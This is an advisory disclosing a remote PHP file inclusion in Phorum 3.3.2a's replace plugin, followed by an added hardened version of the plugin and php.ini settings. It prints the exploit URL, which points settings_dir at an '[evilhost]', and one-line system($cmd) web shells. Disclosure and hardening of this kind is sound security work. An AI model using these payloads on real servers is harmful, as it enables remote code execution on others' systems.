Target: Phorum 3.3.2a (prior versions?)

Description: In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users include external PHP scripts and execute arbitrary code.

Found by: Markus Arndt <markus-arndt@web.de>
Vendor: http://www.phorum.org
Notified Vendor: Yes, already fixed version available

Details:

After extracting the Phorum 3.3.2a archive we have lots of PHP files and subfolders. I just snooped around a bit and found this file vulnerable to remote script inclusion:

./plugin/replace/plugin.php

Let's see some code:

<?php
include("$PHORUM[settings_dir]/replace.php");

function mod_replace_read_body ($body) {
    global $pluginreplace;
    reset($pluginreplace);
    while(list($key,$val) = each($pluginreplace)) {
        $body = str_replace($key,$val,$body);
    }
    return $body;
}

$plugins["read_body"]["mod_replace"]="mod_replace_read_body";
?>

Easy one..

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

This one will get the file http://[evilhost]/replace.php and execute it.

If [evilhost] has PHP enabled we could use this one as replace.php:

<? echo("<? system(\"\$cmd\"); ?>"); ?>

If it's not PHP-enabled simply:

<? system("$cmd"); ?>

Markus Arndt <markus-arndt@web.de>
http://skka.de
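
For comparison with the plugin.php shown above, a hardened variant that refuses direct requests and only includes a local replace.php. This is an added example, not Phorum's actual fix and not part of the original advisory. The PHORUM_ENTRY constant, the safe_settings_file() helper and the location of the forum root are assumptions.

```php
<?php
// Added example: a hardened plugin/replace/plugin.php (not Phorum's actual fix).
// PHORUM_ENTRY is a hypothetical constant; the forum's entry script is assumed
// to define it before loading plugins, so a direct request to this file stops here.
if (!defined('PHORUM_ENTRY')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access not permitted.');
}

// Reject any attempt to supply $PHORUM through the request (register_globals).
foreach (array($_GET, $_POST, $_COOKIE) as $input) {
    if (isset($input['PHORUM'])) {
        exit('Invalid request.');
    }
}

// Hypothetical helper: return the real path of replace.php only when it is a
// local file inside $baseDir; return false for URLs, wrappers and traversal.
function safe_settings_file($settingsDir, $baseDir)
{
    if (!is_string($settingsDir) || strpos($settingsDir, '://') !== false) {
        return false;
    }
    $base = realpath($baseDir);
    $file = realpath($settingsDir . '/replace.php');
    if ($base === false || $file === false || !is_file($file)) {
        return false;
    }
    return strpos($file, $base . DIRECTORY_SEPARATOR) === 0 ? $file : false;
}

// Assumption: the settings directory lives under the forum root, two levels up.
$dir  = isset($PHORUM['settings_dir']) ? $PHORUM['settings_dir'] : null;
$file = safe_settings_file($dir, dirname(__FILE__) . '/../..');
if ($file === false) {
    exit('Settings file not found.');
}
include $file; // defines $pluginreplace

function mod_replace_read_body($body)
{
    global $pluginreplace;
    if (is_array($pluginreplace)) {
        $body = str_replace(array_keys($pluginreplace), array_values($pluginreplace), $body);
    }
    return $body;
}
$plugins["read_body"]["mod_replace"] = "mod_replace_read_body";
```

On the server side, register_globals = Off and allow_url_fopen = Off in php.ini remove the two conditions the inclusion depends on: request variables reaching $PHORUM, and include() fetching an http:// path.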